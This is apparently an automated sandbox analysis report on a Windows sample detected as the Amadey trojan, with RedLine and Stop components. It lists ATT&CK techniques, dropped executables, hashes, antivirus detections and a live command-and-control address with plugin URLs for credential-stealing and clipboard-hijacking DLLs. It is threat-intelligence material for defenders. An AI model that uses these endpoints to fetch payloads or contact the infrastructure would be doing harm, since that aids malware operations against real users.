                              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                              Valid Accounts3
                              Native API
                              1
                              Windows Service
                              2
                              Bypass User Access Control
                              21
                              Disable or Modify Tools
                              1
                              Input Capture
                              2
                              System Time Discovery
                              Remote Services1
                              Archive Collected Data
                              Exfiltration Over Other Network Medium14
                              Ingress Tool Transfer
                              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                              System Shutdown/Reboot
                              Default Accounts2
                              Command and Scripting Interpreter
                              1
                              Scheduled Task/Job
                              1
                              Access Token Manipulation
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              Account Discovery
                              Remote Desktop Protocol1
                              Input Capture
                              Exfiltration Over Bluetooth2
                              Encrypted Channel
                              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                              Domain Accounts1
                              Scheduled Task/Job
                              1
                              Registry Run Keys / Startup Folder
                              1
                              Windows Service
                              2
                              Obfuscated Files or Information
                              Security Account Manager3
                              File and Directory Discovery
                              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                              Non-Application Layer Protocol
                              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                              Local Accounts1
                              Service Execution
                              1
                              Services File Permissions Weakness
                              111
                              Process Injection
                              2
                              Software Packing
                              NTDS36
                              System Information Discovery
                              Distributed Component Object ModelInput CaptureScheduled Transfer113
                              Application Layer Protocol
                              SIM Card SwapCarrier Billing Fraud
                              Cloud AccountsCronNetwork Logon Script1
                              Scheduled Task/Job
                              1
                              Timestomp
                              LSA Secrets131
                              Security Software Discovery
                              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                              Replication Through Removable MediaLaunchdRc.common1
                              Registry Run Keys / Startup Folder
                              2
                              Bypass User Access Control
                              Cached Domain Credentials21
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                              External Remote ServicesScheduled TaskStartup Items1
                              Services File Permissions Weakness
                              1
                              Masquerading
                              DCSync2
                              Process Discovery
                              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                              Virtualization/Sandbox Evasion
                              Proc Filesystem1
                              System Owner/User Discovery
                              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                              Access Token Manipulation
                              /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                              Process Injection
                              Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                              Services File Permissions Weakness
                              Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                              Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                              Rundll32
                              KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 signatures2 2 Behavior Graph ID: 800983 Sample: file.exe Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 65 Snort IDS alert for network traffic 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 8 other signatures 2->71 9 file.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 4 other processes 2->16 process3 file4 55 C:\Users\user\AppData\Local\Temp\...\xriv.exe, PE32 9->55 dropped 57 C:\Users\user\AppData\Local\Temp\...\bPsg.exe, PE32 9->57 dropped 18 bPsg.exe 1 4 9->18         started        22 xriv.exe 3 9->22         started        process5 file6 49 C:\Users\user\AppData\Local\Temp\...\nika.exe, PE32 18->49 dropped 51 C:\Users\user\AppData\Local\Temp\...\aPsf.exe, PE32 18->51 dropped 73 Multi AV Scanner detection for dropped file 18->73 75 Machine Learning detection for dropped file 18->75 24 aPsf.exe 9 1 18->24         started        27 nika.exe 1 1 18->27         started        53 C:\Users\user\AppData\Local\...\mnolyk.exe, PE32 22->53 dropped 77 Contains functionality to inject code into remote processes 22->77 29 mnolyk.exe 18 22->29         started        signatures7 process8 dnsIp9 79 Detected unpacking (changes PE section rights) 24->79 81 Detected unpacking (overwrites its own PE header) 24->81 83 Disable Windows Defender notifications (registry) 24->83 85 Disable Windows Defender real time protection (registry) 24->85 63 62.204.41.4, 49694, 49695, 49696 TNNET-ASTNNetOyMainnetworkFI United Kingdom 29->63 59 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 29->59 dropped 61 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 29->61 dropped 87 Multi AV Scanner detection for dropped file 29->87 89 Creates an undocumented autostart registry key 29->89 91 Machine Learning detection for dropped file 29->91 93 Uses schtasks.exe or at.exe to add and modify task schedules 29->93 33 cmd.exe 1 29->33         started        35 schtasks.exe 1 29->35         started        37 rundll32.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 33->39         started        41 cmd.exe 1 33->41         started        43 cmd.exe 1 33->43         started        47 4 other processes 33->47 45 conhost.exe 35->45         started       

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              file.exe66%ReversingLabsWin32.Trojan.Amadey
                              file.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll81%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe81%ReversingLabsWin32.Spyware.RedLine
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe55%ReversingLabsWin32.Trojan.Tedy
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe81%ReversingLabsWin32.Spyware.RedLine
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe45%ReversingLabsWin32.Ransomware.Stop
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe82%ReversingLabsByteCode-MSIL.Trojan.Disabler
                              C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll81%ReversingLabsWin32.Trojan.Amadey
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              http://62.204.41.4/Gol478Ns/index.php79e5342a20%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dll0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.php=0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.php$0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpx0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpC#0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpI#0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpEE0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpYR0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dllZkoL0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpeC0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.php3#0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpsoft0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.php5C0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.php(0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpQ0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phprundll32.exe0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpEC:L0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpft0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpUC0%Avira URL Cloudsafe
                              62.204.41.4/Gol478Ns/index.php100%Avira URL Cloudmalware
                              http://62.204.41.4/Gol478Ns/index.php100%Avira URL Cloudmalware
                              http://62.204.41.4/Gol478Ns/Plugins/clip64.dll100%Avira URL Cloudmalware
                              No contacted domains info
                              NameMaliciousAntivirus DetectionReputation
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dlltrue
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/Plugins/clip64.dlltrue
                              • Avira URL Cloud: malware
                              unknown
                              62.204.41.4/Gol478Ns/index.phptrue
                              • Avira URL Cloud: malware
                              low
                              http://62.204.41.4/Gol478Ns/index.phptrue
                              • Avira URL Cloud: malware
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://62.204.41.4/Gol478Ns/index.php=mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.php79e5342a2mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpxmnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.php$mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpYRmnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpI#mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpC#mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpEEmnolyk.exe, 0000000F.00000002.776777410.0000000000FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpeCmnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dllZkoLmnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.php(mnolyk.exe, 0000000F.00000002.776777410.0000000000FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpsoftmnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpEC:Lmnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.php3#mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phprundll32.exemnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpQmnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.php5Cmnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpUCmnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpftmnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              62.204.41.4
                              unknownUnited Kingdom
                              30798TNNET-ASTNNetOyMainnetworkFItrue
                              Joe Sandbox Version:36.0.0 Rainbow Opal
                              Analysis ID:800983
                              Start date and time:2023-02-07 23:05:24 +01:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 12m 21s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:34
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample file name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@37/14@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 65.2% (good quality ratio 62.4%)
                              • Quality average: 84.9%
                              • Quality standard deviation: 24.4%
                              HCA Information:
                              • Successful, ratio: 92%
                              • Number of executed functions: 99
                              • Number of non-executed functions: 122
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240s for rundll32
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              TimeTypeDescription
                              23:06:59Task SchedulerRun new task: mnolyk.exe path: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              23:06:59API Interceptor2553x Sleep call for process: mnolyk.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              62.204.41.4file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              UUZl6EPjNN.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              TNNET-ASTNNetOyMainnetworkFIfile.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.134
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.134
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.134
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllfile.exeGet hashmaliciousBrowse
                                file.exeGet hashmaliciousBrowse
                                  file.exeGet hashmaliciousBrowse
                                    file.exeGet hashmaliciousBrowse
                                      file.exeGet hashmaliciousBrowse
                                        file.exeGet hashmaliciousBrowse
                                          file.exeGet hashmaliciousBrowse
                                            file.exeGet hashmaliciousBrowse
                                              file.exeGet hashmaliciousBrowse
                                                file.exeGet hashmaliciousBrowse
                                                  file.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      file.exeGet hashmaliciousBrowse
                                                        file.exeGet hashmaliciousBrowse
                                                          file.exeGet hashmaliciousBrowse
                                                            file.exeGet hashmaliciousBrowse
                                                              file.exeGet hashmaliciousBrowse
                                                                file.exeGet hashmaliciousBrowse
                                                                  file.exeGet hashmaliciousBrowse
                                                                    UUZl6EPjNN.exeGet hashmaliciousBrowse
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      File Type:CSV text
                                                                      Category:dropped
                                                                      Size (bytes):226
                                                                      Entropy (8bit):5.354940450065058
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                      MD5:B10E37251C5B495643F331DB2EEC3394
                                                                      SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                      SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                      SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):321
                                                                      Entropy (8bit):5.355221377978991
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                                                                      MD5:03C5BA5FCE7124B503EA65EF522177C3
                                                                      SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                                                                      SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                                                                      SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):91136
                                                                      Entropy (8bit):6.3469756750979025
                                                                      Encrypted:false
                                                                      SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                      MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                      SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                      SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                      SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Joe Sandbox View:
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: UUZl6EPjNN.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):241664
                                                                      Entropy (8bit):6.368190069123744
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                      MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                      SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                      SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):347136
                                                                      Entropy (8bit):7.642032843699542
                                                                      Encrypted:false
                                                                      SSDEEP:6144:KMy+bnr+Vp0yN90QECj84+S0b8uLwNIBmJqVZJzxWN7HEm7uN9j:MMrNy90wj84L0b8uk3JAZd4N7HEmirj
                                                                      MD5:F0D05D7896B3839E5CFBCC78E4FD87FF
                                                                      SHA1:F1B614BD9DC2DF396540AF1D75A8F41BFE79DBA6
                                                                      SHA-256:02108271649642C959DABE306ECD825A07B9978222B46E31C12E68C80154A640
                                                                      SHA-512:37F08DA2D33FCC3F70DBC21CCAA293C5E581E7E513BD9F54288BCB1D635DED8AFEB1D0A5943DE1E804008A5D52DA71193CA40AEC8712C2B51AE1A5C34B256660
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.................................d.....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............B..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):241664
                                                                      Entropy (8bit):6.368190069123744
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                      MD5:8BB923C4D81284DAEF7896E5682DF6C6
